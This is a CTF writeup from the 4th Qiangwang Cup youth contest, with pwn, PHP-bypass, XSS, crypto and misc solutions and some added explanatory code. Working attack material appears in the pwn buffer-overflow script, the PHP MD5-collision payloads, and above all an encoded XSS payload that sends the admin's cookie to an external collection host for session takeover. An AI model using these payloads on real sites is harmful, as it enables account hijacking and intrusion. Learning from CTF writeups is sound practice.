
4th Qiangwang Cup (强网杯) Youth Special Competition: partial writeup


pwn: add/subtract/multiply/divide (加减乘除)


Decompiling in IDA shows that the name input overflows into neighbouring variables.
Continuing the analysis, the menu offers four operations:
(a) passcode = 3
(b) passcode += 4
(c) passcode *= 7
(d) passcode /= 5
passcode starts at 0 and is updated by operations a, b, c, d; it must never become greater than 66, and when the final result equals 66 execution continues.
Below that there is an if ( dword_40A0 ) statement: dword_40A0 has to be 1 to get a shell. Since the name input overflows neighbouring variables, it can overwrite dword_40A0.
Approach:
Enter 100 characters of 1 as the name.
Operation sequence: bcbdcbbbbbb
Script:
from pwn import *

p = process('./pwn1')
# 100 bytes of '1' overflow the name buffer and land on dword_40A0, so the if check passes
p.sendlineafter('start: ', '1' * 100)
# menu choices that take passcode from 0 to exactly 66 without ever exceeding it
s = 'bcbdcbbbbbb'
for i in s:
    p.sendlineafter('> ', i)
p.interactive()
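The operation string bcbdcbbbbbb above was worked out by hand. As an added example (not part of the original writeup), the following Python finds it mechanically: a breadth-first search over the four menu operations that never lets the running value exceed the 66 bound the program enforces. The operation table is transcribed from the writeup; treating option (d) as integer division is an assumption (the binary works on a C integer, and the walkthrough's 32 / 5 = 6 step depends on it). The search generalizes to any start value, target and limit.

```python
from collections import deque

# Operation table transcribed from the writeup's menu. Option (d) is assumed to be
# integer division, as it is on a C int in the binary.
OPS = {
    "a": lambda v: 3,        # passcode = 3
    "b": lambda v: v + 4,    # passcode += 4
    "c": lambda v: v * 7,    # passcode *= 7
    "d": lambda v: v // 5,   # passcode /= 5
}


def shortest_sequence(start=0, target=66, limit=66, ops=OPS):
    """Breadth-first search over the menu options.

    Returns the shortest option string that turns `start` into `target` while the
    running value never exceeds `limit` (the check the program applies after every
    step), or None if no such sequence exists.
    """
    queue = deque([(start, "")])
    seen = {start}
    while queue:
        value, path = queue.popleft()
        if value == target:
            return path
        for name, step in ops.items():
            nxt = step(value)
            if nxt > limit or nxt in seen:
                continue
            seen.add(nxt)
            queue.append((nxt, path + name))
    return None


def replay(path, start=0, ops=OPS):
    """Apply an option string and return every intermediate value, so the bound can be audited."""
    trace = [start]
    for name in path:
        trace.append(ops[name](trace[-1]))
    return trace


if __name__ == "__main__":
    seq = shortest_sequence()
    print(seq, replay(seq))
```

Running it prints bcbdcbbbbbb together with the trace 0, 4, 28, 32, 6, 42, 46, 50, 54, 58, 62, 66; the search confirms that this is the shortest sequence and that no intermediate value breaks the bound.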

web: easy_php

Code audit
Bypass 1
if( ($_GET['a1'] == $_GET['a2']) || (md5($_GET['a1']) != md5($_GET['a2'])) ){
    die("No");
}
Bypass with arrays (md5() of an array returns null for both, and the arrays themselves are unequal):
a1[]=1&a2[]=2
Bypass 2
if( ($_GET['b1'] === $_GET['b2']) || (md5($_GET['b1']) !== md5($_GET['b2'])) ){
    die("NoNo");
}
With strict comparison the array trick no longer works, so use the payload from [安洵杯 2019 easy_web] directly: two different byte strings with the same MD5 hash.
Reference: https://www.cnblogs.com/buchuo/p/12611244.html
b1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
Bypass 3
if( strlen($_GET['time'])>4 || $_GET['time']<time() || is_array($_GET['time'])){
    die("NoNoNo");
}
The value must be at most 4 characters, not an array, and still compare greater than the current timestamp; an exponent-notation numeric string (the same family as the 0e trick) satisfies all three:
time=9e12
Final payload:
http://eci-2ze57ktwcm7rytwozj99.cloudeci1.ichunqiu.com/?a1[]=1&a2[]=2&b1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2&time=9e12

web: xss

This challenge is modelled on CISCN2019 East-North China regional Web-XSS.
Reference: https://blog.csdn.net/weixin_44677409/article/details/100741998
The name lookup input is vulnerable to XSS,
but the word script is filtered; writing it twice, nested, gets past the filter:

<scriscriptpt>alert(“xss”)</scrscriptipt>

In the feedback feature an administrator reviews submitted links.
The Admin feature presumably requires the administrator's cookie.

Approach:
Use the feedback feature to have the XSS payload send us the administrator's cookie,
then open Admin with that cookie.
The payload is taken directly from the CISCN2019 East-North China Web-XSS writeup; the script converts it into numeric character references so the filter never sees the keywords:
# 'http://ip/...' is the placeholder host from the original payload
xss = "(function(){window.location.href='http://ip/index.php?do=api&id=odd1Xf&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();"
# rewrite every character as a decimal character reference (&#NN, no semicolon)
output = ""
for c in xss:
    output += "&#" + str(ord(c))
print("eval(\"" + output + "\")")

Submit the payload through the feedback feature:

func2?
csrf_token=IjViMjk5ODA4Nzk3YzI5MzE0ODQwOTliM2Y2Y2ExYmY4MWU1MTk2N2Qi.X1
OAqw.wYz3QvtCOZOpKPGSjNLBuUcP1DU&name=%3Csvg%3E%3Cscrscriptipt%3Eeval
%26%2340%26%2334%26%2340%26%23102%26%23117%26%23110%26%2399%26%23116%
26%23105%26%23111%26%23110%26%2340%26%2341%26%23123%26%23119%26%23105
%26%23110%26%23100%26%23111%26%23119%26%2346%26%23108%26%23111%26%2399
%26%2397%26%23116%26%23105%26%23111%26%23110%26%2346%26%23104%26%23114
%26%23101%26%23102%26%2361%26%2339%26%23104%26%23116%26%23116%26%2311
2%26%2358%26%2347%26%2347%26%23111%26%23107%26%2397%26%23109%26%23105
%26%23104%26%23109%26%2346%26%23101%26%2349%26%2346%26%23108%26%23117
%26%23121%26%23111%26%23117%26%23120%26%23105%26%2397%26%2346%26%2311
0%26%23101%26%23116%26%2358%26%2350%26%2350%26%2349%26%2356%26%2349%2
6%2347%26%2363%26%23100%26%23111%26%2361%26%2397%26%23112%26%23105%26
%2338%26%23105%26%23100%26%2361%26%2397%26%23114%26%2372%26%2365%26%2
371%26%23120%26%2338%26%23108%26%23111%26%2399%26%2397%26%23116%26%23
105%26%23111%26%23110%26%2361%26%2339%26%2343%26%23101%26%23115%26%23
99%26%2397%26%23112%26%23101%26%2340%26%2340%26%23102%26%23117%26%231
10%26%2399%26%23116%26%23105%26%23111%26%23110%26%2340%26%2341%26%231
23%26%23116%26%23114%26%23121%26%23123%26%23114%26%23101%26%23116%26%
23117%26%23114%26%23110%26%2332%26%23100%26%23111%26%2399%26%23117%26%
23109%26%23101%26%23110%26%23116%26%2346%26%23108%26%23111%26%2399%26
%2397%26%23116%26%23105%26%23111%26%23110%26%2346%26%23104%26%23114%26
%23101%26%23102%26%23125%26%2399%26%2397%26%23116%26%2399%26%23104%26
%2340%26%23101%26%2341%26%23123%26%23114%26%23101%26%23116%26%23117%2
6%23114%26%23110%26%2332%26%2339%26%2339%26%23125%26%23125%26%2341%26
%2340%26%2341%26%2341%26%2343%26%2339%26%2338%26%23116%26%23111%26%23
112%26%23108%26%23111%26%2399%26%2397%26%23116%26%23105%26%23111%26%23
110%26%2361%26%2339%26%2343%26%23101%26%23115%26%2399%26%2397%26%2311
2%26%23101%26%2340%26%2340%26%23102%26%23117%26%23110%26%2399%26%2311
6%26%23105%26%23111%26%23110%26%2340%26%2341%26%23123%26%23116%26%2311
4%26%23121%26%23123%26%23114%26%23101%26%23116%26%23117%26%23114%26%2
3110%26%2332%26%23116%26%23111%26%23112%26%2346%26%23108%26%23111%26%2
399%26%2397%26%23116%26%23105%26%23111%26%23110%26%2346%26%23104%26%2
3114%26%23101%26%23102%26%23125%26%2399%26%2397%26%23116%26%2399%26%2
3104%26%2340%26%23101%26%2341%26%23123%26%23114%26%23101%26%23116%26%
23117%26%23114%26%23110%26%2332%26%2339%26%2339%26%23125%26%23125%26%
2341%26%2340%26%2341%26%2341%26%2343%26%2339%26%2338%26%2399%26%23111
%26%23111%26%23107%26%23105%26%23101%26%2361%26%2339%26%2343%26%23101
%26%23115%26%2399%26%2397%26%23112%26%23101%26%2340%26%2340%26%23102%
26%23117%26%23110%26%2399%26%23116%26%23105%26%23111%26%23110%26%2340%
26%2341%26%23123%26%23116%26%23114%26%23121%26%23123%26%23114%26%23101
%26%23116%26%23117%26%23114%26%23110%26%2332%26%23100%26%23111%26%2399
%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%2399%26%23111
%26%23111%26%23107%26%23105%26%23101%26%23125%26%2399%26%2397%26%2311
6%26%2399%26%23104%26%2340%26%23101%26%2341%26%23123%26%23114%26%2310
1%26%23116%26%23117%26%23114%26%23110%26%2332%26%2339%26%2339%26%2312
5%26%23125%26%2341%26%2340%26%2341%26%2341%26%2343%26%2339%26%2338%2
6%23111%26%23112%26%23101%26%23110%26%23101%26%23114%26%2361%26%2339%2
6%2343%26%23101%26%23115%26%2399%26%2397%26%23112%26%23101%26%2340%26
%2340%26%23102%26%23117%26%23110%26%2399%26%23116%26%23105%26%23111%26
%23110%26%2340%26%2341%26%23123%26%23116%26%23114%26%23121%26%23123%2
6%23114%26%23101%26%23116%26%23117%26%23114%26%23110%26%2332%26%2340%26%23119%26%23105%26%23110%26%23100%26%23111%26%23119%26%2346%26%23111%
26%23112%26%23101%26%23110%26%23101%26%23114%26%2332%26%2338%26%2338%
26%2332%26%23119%26%23105%26%23110%26%23100%26%23111%26%23119%26%2346%
26%23111%26%23112%26%23101%26%23110%26%23101%26%23114%26%2346%26%23108
%26%23111%26%2399%26%2397%26%23116%26%23105%26%23111%26%23110%26%2346
%26%23104%26%23114%26%23101%26%23102%26%2341%26%2363%26%23119%26%2310
5%26%23110%26%23100%26%23111%26%23119%26%2346%26%23111%26%23112%26%231
01%26%23110%26%23101%26%23114%26%2346%26%23108%26%23111%26%2399%26%23
97%26%23116%26%23105%26%23111%26%23110%26%2346%26%23104%26%23114%26%23
101%26%23102%26%2358%26%2339%26%2339%26%23125%26%2399%26%2397%26%2311
6%26%2399%26%23104%26%2340%26%23101%26%2341%26%23123%26%23114%26%2310
1%26%23116%26%23117%26%23114%26%23110%26%2332%26%2339%26%2339%26%2312
5%26%23125%26%2341%26%2340%26%2341%26%2341%26%2359%26%23125%26%2341%
26%2340%26%2341%26%2359%26%2334%26%2341%3C%2Fscrscriptipt%3E&submit=Get+It
%21

The administrator's cookie is received successfully.

Open admin with that cookie set.
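As an added, defender-side illustration (not code from the writeup), the following Python shows why the filter described in this challenge fails and what the fix looks like. A single-pass removal of the word script turns scriscriptpt back into script, so a check run on the raw input passes while the text that actually reaches the browser contains a script tag; the payload's arguments are written as numeric character references without semicolons, which the parser resolves as a browser would (the payload wraps them in an svg element because inside SVG foreign content the script body is ordinary character data, where references are decoded, unlike an HTML script element). The robust fix is to encode on output rather than blacklist on input. The challenge's real filter code is not on the page, so the single-pass str.replace is an assumption about its shape, and the sample string is constructed.

```python
import html
import re

# Constructed sample in the shape of the writeup's double-write payload.
SAMPLE = '<scriscriptpt>alert("xss")</scrscriptipt>'

SCRIPT_OPENER = re.compile(r"<\s*script\b", re.IGNORECASE)


def naive_filter(text):
    """Assumed shape of the challenge's filter: delete the word 'script' in a single pass."""
    return text.replace("script", "")


def recursive_filter(text):
    """Keep deleting until the text stops changing, so 'scri' + 'script' + 'pt' cannot re-form the word."""
    while True:
        stripped = naive_filter(text)
        if stripped == text:
            return text
        text = stripped


def has_script_opener(text):
    """Detection check. It is only meaningful on the text as it will be sent to the browser."""
    return SCRIPT_OPENER.search(text) is not None


def decode_entities(text):
    """What a browser does with &#NN references (semicolon optional) in character data."""
    return html.unescape(text)


def safe_render(text):
    """The actual fix: context-aware output encoding instead of a keyword blacklist."""
    return html.escape(text, quote=True)


if __name__ == "__main__":
    print("raw input flagged:      ", has_script_opener(SAMPLE))
    print("after naive filter:     ", naive_filter(SAMPLE))
    print("after naive, flagged:   ", has_script_opener(naive_filter(SAMPLE)))
    print("after recursive filter: ", recursive_filter(SAMPLE))
    print("entity-decoded args:    ", decode_entities("eval(&#97&#108&#101&#114&#116&#40&#49&#41)"))
    print("output-encoded:         ", safe_render(SAMPLE))
```

The recursive filter still belongs to the blacklist family (it strips the word from harmless text and says nothing about other tags or event handlers); it is shown only to make the single-pass defect visible. Any detection rule should be evaluated on the post-filter, entity-decoded text, which is what the victim's browser will parse.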

web: easy_http

GET parameter: fruit=apple
POST parameter: vegetable=potato
Request header: User-Agent: Http_1s_W0nd3rful

crypto: simple algorithm (简单算法)

Reverse the algorithm: each output byte is (input byte minus its 1-based position) XOR 86.
Script:
s = [49, 60, 58, 53, 50, 107, 117, 63, 57, 107, 63, 109, 66, 137, 65, 119, 118, 128, 142, 118, 117, 118,
     123, 147, 77, 126, 130, 124, 152, 80, 127, 134, 83, 87, 134, 87, 147, 148, 142, 95, 93, 85]
flag = ''
k = 0
for i in s:
    k = k + 1
    # subtraction binds tighter than ^, so this is (i - k) ^ 86
    flag += chr((i - k) ^ 86)
print(flag)

crypto: easy_Crypto

Crypto3_1.txt contains ゚ω゚ノ=/m ́)ノ~┻━┻ //* ́∇*/['_'];o=…, which is aaencode.
Decoder: https://www.qtool.net/decode

It decodes to the number 5.
crypto3_2.png is a pigpen cipher.
Decoder: http://ctf.ssleye.com/pigpen.html

The challenge description indicates a rail fence cipher, and the 5 obtained from aadecode is the number of rails.
Decoder: https://cryptii.com/pipes/rail-fence-cipher
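The writeup uses an online decoder for the last step. As an added example (not from the writeup, which does not show the ciphertext), here is the rail fence transposition written out so the 5-rail decode can be done offline: characters are written along a zig-zag of the given number of rails and read off row by row; decoding sorts the positions by (row, position) to learn where each ciphertext character came from. The sample strings are constructed; the 3-rail value is the standard textbook example. This is the plain zig-zag variant with no offset.

```python
def _rows(length, rails):
    """Row index of each position along the zig-zag (period 2 * (rails - 1))."""
    cycle = 2 * (rails - 1)
    return [min(i % cycle, cycle - i % cycle) for i in range(length)]


def rail_encode(text, rails):
    """Write `text` along the zig-zag and read the rails top to bottom."""
    if rails < 2:
        return text
    rows = _rows(len(text), rails)
    return "".join(ch for r in range(rails) for ch, row in zip(text, rows) if row == r)


def rail_decode(cipher, rails):
    """Inverse: the i-th ciphertext char belongs to the i-th position in (row, index) order."""
    if rails < 2:
        return cipher
    rows = _rows(len(cipher), rails)
    order = sorted(range(len(cipher)), key=lambda i: (rows[i], i))
    plain = [""] * len(cipher)
    for ch, pos in zip(cipher, order):
        plain[pos] = ch
    return "".join(plain)


if __name__ == "__main__":
    # Constructed sample: the key from the aadecode step is 5 rails.
    msg = "flag{rail_fence_with_five_rails}"
    ct = rail_encode(msg, 5)
    print(ct)
    print(rail_decode(ct, 5))
```

If an online tool's result disagrees, the likely cause is a different variant (an offset into the zig-zag, or reading the rails in another order) rather than a wrong rail count.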

crypto: base64

The challenge gives a plaintext and its ciphertext, plus the ciphertext of the flag.
Plain base64 decoding fails, so the base64 alphabet has presumably been permuted.
Infer the substitution from the plaintext/ciphertext pair.
Original data:
sadhlkj122i3upoi213456aABSADHKJHLKJSADSADJLKHUOIPQWUEYUGHJ123456789012233165410123123456789123709864hjklhfjldsnfzkpidjskljkamxcvmbcxamvbnm
Encrypted data:
h2QDfRrKfCPsxFDticMpfYTrxtV1yFQMVEyMWPAwXDAxX0IYVZWYVZWvYPnTaZ9uZQQcaZaeaZiTXCPsxtV1yCh4zYLrxCTtxtP2yYVrxOPsxtPsxtV1yCh4zYPsxthqzYl2yRAJf2rHeFImeSyoeGIKhREDfGyKgRIKdb14d3endFy4db12dF5nn
Standard base64 of the original data, computed by us:
c2FkaGxrajEyMmkzdXBvaTIxMzQ1NmFBQlNBREhLSkhMS0pTQURTQURKTEtIVU9JUFFXVUVZVUdISjEyMzQ1Njc4OTAxMjIzMzE2NTQxMDEyMzEyMzQ1Njc4OTEyMzcwOTg2NGhqa2xoZmpsZHNuZnprcGlkanNrbGprYW14Y3ZtYmN4YW12Ym5t
Comparing the two, c in standard base64 became h, digits are unchanged, F became Q, and so on.
Applying the same mapping in reverse to the ciphertext in flag.txt gives:
ZmxhZ3t (N: unknown) YXNlNjRfMXNfUzBfRjRudGE1dGlj (k: unknown) Q==
but k and N never occur in the known pair, so they have to be guessed.

From the flag format we can infer k → f,
and a brute-force guess gives N → C,
so the fully restored ciphertext is:
ZmxhZ3tCYXNlNjRfMXNfUzBfRjRudGE1dGljfQ==
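As an added example (not code from the writeup), the following Python carries out the table recovery above mechanically: it base64-encodes the known plaintext, aligns it symbol by symbol with the known ciphertext, reports which standard symbols the pair never covers, and rewrites a ciphertext into standard base64 with ? for unresolved symbols. The known pair is the challenge data quoted on this page. The flag ciphertext itself is not on the page, so FLAG_CIPHER is constructed here by mapping the writeup's restored text back through the recovered table (using its guesses N → C and k → f); it therefore has the shape flag.txt must have had, but it is my reconstruction.

```python
import base64

STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Known plaintext/ciphertext pair quoted from the writeup (the challenge's own data).
KNOWN_PLAIN = (
    b"sadhlkj122i3upoi213456aABSADHKJHLKJSADSADJLKHUOIPQWUEYUGHJ12345678901223"
    b"3165410123123456789123709864hjklhfjldsnfzkpidjskljkamxcvmbcxamvbnm"
)
KNOWN_CIPHER = (
    "h2QDfRrKfCPsxFDticMpfYTrxtV1yFQMVEyMWPAwXDAxX0IYVZWYVZWvYPnTaZ9uZQQ"
    "caZaeaZiTXCPsxtV1yCh4zYLrxCTtxtP2yYVrxOPsxtPsxtV1yCh4zYPsxthqzYl2yRAJf2rHeFIme"
    "SyoeGIKhREDfGyKgRIKdb14d3endFy4db12dF5nn"
)
# Constructed for this example (not from the page): the writeup's restored flag text
# mapped back through the table below with its guesses N->C and k->f.
FLAG_CIPHER = "eFrAe3nNdcyEyCWkxcykZtMkWCWoiRP1iRECkV=="


def derive_table(plain, cipher):
    """Align standard base64 of the known plaintext with the custom ciphertext.

    Returns (cipher-symbol -> standard-symbol dict, set of standard symbols never seen).
    Raises if one ciphertext symbol would have to map to two standard symbols, which
    would mean the data is not a simple alphabet substitution.
    """
    std = base64.b64encode(plain).decode()
    table = {}
    for c, s in zip(cipher, std):  # zip stops at the shorter string
        if table.get(c, s) != s:
            raise ValueError(f"symbol {c!r} maps to both {table[c]!r} and {s!r}")
        table[c] = s
    missing = set(STD_ALPHABET) - set(table.values())
    return table, missing


def restore(cipher, table, guesses=None):
    """Rewrite ciphertext as standard base64; '?' marks symbols the known pair never covered."""
    full = {**table, **(guesses or {})}
    return "".join("=" if c == "=" else full.get(c, "?") for c in cipher)


def decode(cipher, table, guesses=None):
    """Decode once every symbol is resolved; returns None while any '?' remains."""
    std = restore(cipher, table, guesses)
    return None if "?" in std else base64.b64decode(std)


if __name__ == "__main__":
    table, missing = derive_table(KNOWN_PLAIN, KNOWN_CIPHER)
    print("unobserved standard symbols:", "".join(sorted(missing)))
    print("partial:", restore(FLAG_CIPHER, table))
    print("with guesses:", decode(FLAG_CIPHER, table, {"N": "C", "k": "f"}))
```

The partial restoration marks every occurrence of an unresolved symbol, so the standard f inside NjRf, MXNf and UzBf shows up as ? as well; the number of ? positions is a quick measure of how much guessing remains, and the missing set tells you exactly which standard symbols a longer known plaintext would need to contain.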

crypto: moss

Opening the file gives a string of Morse code; decoding it yields F L A G %u7b M O S S I S V E R Y F 4 N T Y %u7d.
That is not in flag format, so lowercase all the letters and, following the flag format, replace %u7b and %u7d with { and }:

flag{mossisveryf4nty}

misc: easy_pcap

Open the easy_pcap capture. As the description says, network traffic is simply the data users send over the network; the display filter http contains php shows a request for:

ZmxhZyU3QjElMjdtX0g0Y0tfVjFzaTdfWTB1Ul9Db01wdXRlcl9hd2VTb21lJTdE.php
base64-decode the file name.
Python script:
import base64

a = 'ZmxhZyU3QjElMjdtX0g0Y0tfVjFzaTdfWTB1Ul9Db01wdXRlcl9hd2VTb21lJTdE'
b = base64.b64decode(a)
print(b)
This gives flag%7B1%27m_H4cK_V1si7_Y0uR_CoMputer_aweSome%7D; URL-decode it:

flag{1’m_H4cK_V1si7_Y0uR_CoMputer_aweSome}

misc: git riddle (git 谜底)

Unzipping the archive reveals a .git folder; its config file contains a link:
https://github.com/maxcruz/stegano_midi
Open it in a browser and download the tool; its README.md explains the usage.
Copy our enjoy.mid into the tool's directory and run: python stegano-midi.py --reveal --file=enjoy.mid to reveal the flag.
Note: if it complains about a missing library, install it as the error message indicates.

Flag:
flag{misc_stegano_is_everywhere}

misc: Luo_Tianyi

From the description, the first idea is to check for embedded files with binwalk: nothing.
Re-reading the challenge, the name is unusual, which suggests steghide with the name as the passphrase.
With steghide: steghide extract -sf timg.jpg -p luotianyi produces flag.txt, which contains the flag.

Flag:
flag{8dfe88db-0def-4873-9f17-f9c46bd571b6}

misc: everything is visual (一切皆可视)

Following the description, a Baidu search for visual programming turned up the Snap language. Opening the attachment baby_code.xml and inspecting it revealed a https://snap.berkeley.edu link, which is exactly Snap, so open that link.
Click run as shown in the screenshot:

First import the xml file, then click Variables, drag the test variable on the right onto the "say no!!! for 5 secs" block so that test replaces no!!!; the list of numbers is then displayed. Interpreting them through the flag format shows that the bottom 5 entries are exactly flag{, so the list reads from bottom to top:

Indexing the numbers into the character set (qwertyuiopasdfghjklzxcvbnm1234567890@!_{}) gives the flag:

flag{w3l1C0m3_@nd_G00d_lUck!}
